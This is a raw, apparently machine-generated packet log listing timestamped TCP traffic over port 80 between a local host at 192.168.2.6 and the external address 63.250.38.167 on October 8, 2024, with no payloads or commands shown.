Oct 8, 2024 11:32:33.067984104 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.068658113 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.068671942 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.068682909 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.068700075 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.068702936 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.068708897 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.068718910 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.068730116 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.068732977 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.068752050 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.068777084 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.069591999 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.069670916 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.069681883 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.069694042 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.069705963 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.069717884 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.069725037 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.069730043 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.069772005 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.069838047 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.070527077 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.070542097 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.070552111 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.070561886 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.070571899 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.070574045 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.070585966 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.070595980 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.070600033 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.070620060 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.070638895 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.071345091 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.071412086 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.071422100 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.071451902 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.071455002 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.071461916 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.071475029 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.071485996 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.071496964 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.071511030 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.072314978 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.072328091 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.072345018 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.072355032 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.072361946 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.072365046 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.072374105 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.072386026 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.072391987 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.072411060 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.072432041 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.073157072 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111731052 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111746073 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111757040 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111782074 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.111833096 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.111852884 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111864090 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111874104 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111884117 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111893892 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111905098 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111907005 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.111915112 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.111918926 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.111933947 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.153812885 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156084061 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156104088 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156116009 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156126022 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156136990 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156147003 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156161070 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156168938 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156173944 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156186104 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156203985 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156208038 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156213999 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156224012 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156234026 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156244040 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156244993 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156254053 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156266928 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156269073 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156287909 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156292915 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156299114 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156307936 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156311035 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156317949 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156327009 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156336069 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156338930 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156356096 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156363010 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156364918 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156378984 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156379938 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156389952 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156399965 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156403065 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156409979 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156421900 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156431913 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156435966 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156441927 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.156449080 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.156482935 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157015085 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157167912 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157181025 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157191038 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157203913 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157216072 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157222033 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157227993 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157238007 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157242060 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157254934 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157263041 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157268047 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157279968 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157284975 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157293081 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157303095 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157313108 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157325029 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157329082 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157339096 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157347918 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157351017 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157357931 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157367945 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157371044 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157373905 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157385111 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157387018 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157397032 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157412052 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157442093 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.157963991 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157974958 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157984972 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.157999039 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158010006 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158021927 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158031940 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158051014 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158088923 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158113956 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158123970 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158134937 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158147097 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158149004 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158159018 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158173084 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158174038 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158186913 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158195019 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158207893 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158238888 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158252001 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158265114 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158277035 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158284903 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158289909 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158303022 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158307076 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158314943 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158328056 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158333063 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158350945 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.158945084 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.158987999 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159004927 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159167051 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159214020 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.159248114 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159332037 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159342051 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159352064 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159379959 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.159399033 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159409046 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159420013 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159430027 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159461021 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.159610987 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159621954 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159631968 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159641981 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159651995 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159662008 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159672022 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159674883 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.159698009 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.159717083 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.159895897 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.159970999 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.160011053 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.160105944 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.160159111 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.160170078 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.160196066 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.160212040 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.160223007 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.160249949 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.200687885 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.202124119 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.202152967 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.202167034 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.202178955 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.202189922 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.202191114 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.202203989 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.202214956 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.202219009 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.202229977 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.202244043 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.202264071 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.246608973 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246630907 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246642113 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246651888 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246663094 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246676922 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246680021 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.246687889 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246697903 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246706009 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.246709108 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246718884 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246728897 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246736050 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.246738911 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246748924 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246750116 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.246759892 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246769905 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246773005 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.246781111 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246799946 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.246813059 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.246907949 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246954918 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.246967077 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247000933 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247040987 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247052908 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247062922 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247073889 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247081995 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247112989 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247168064 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247199059 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247209072 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247210026 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247246981 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247260094 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247271061 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247282028 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247294903 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247302055 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247308969 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247345924 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247509003 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247550011 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247559071 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247569084 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247620106 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247670889 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247683048 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247709036 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247747898 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247807980 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247819901 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247840881 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247853994 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247865915 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247878075 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247910023 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.247967005 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247983932 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.247993946 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248003960 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248013973 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248023987 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248029947 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248039007 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248049021 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248063087 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248089075 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248328924 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248339891 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248348951 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248368025 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248400927 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248428106 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248440027 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248449087 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248460054 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248471022 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248478889 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248481989 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248491049 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248534918 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248577118 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248588085 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248598099 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248609066 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248615980 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248620033 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248642921 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248735905 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248747110 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248755932 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248765945 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248775959 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248786926 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248799086 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248805046 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.248809099 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.248836040 CEST	50007	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:33.249234915 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249320030 CEST	80	50007	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:33.249330044 CEST	80	50007	63.250.38.167	192.168.2.6
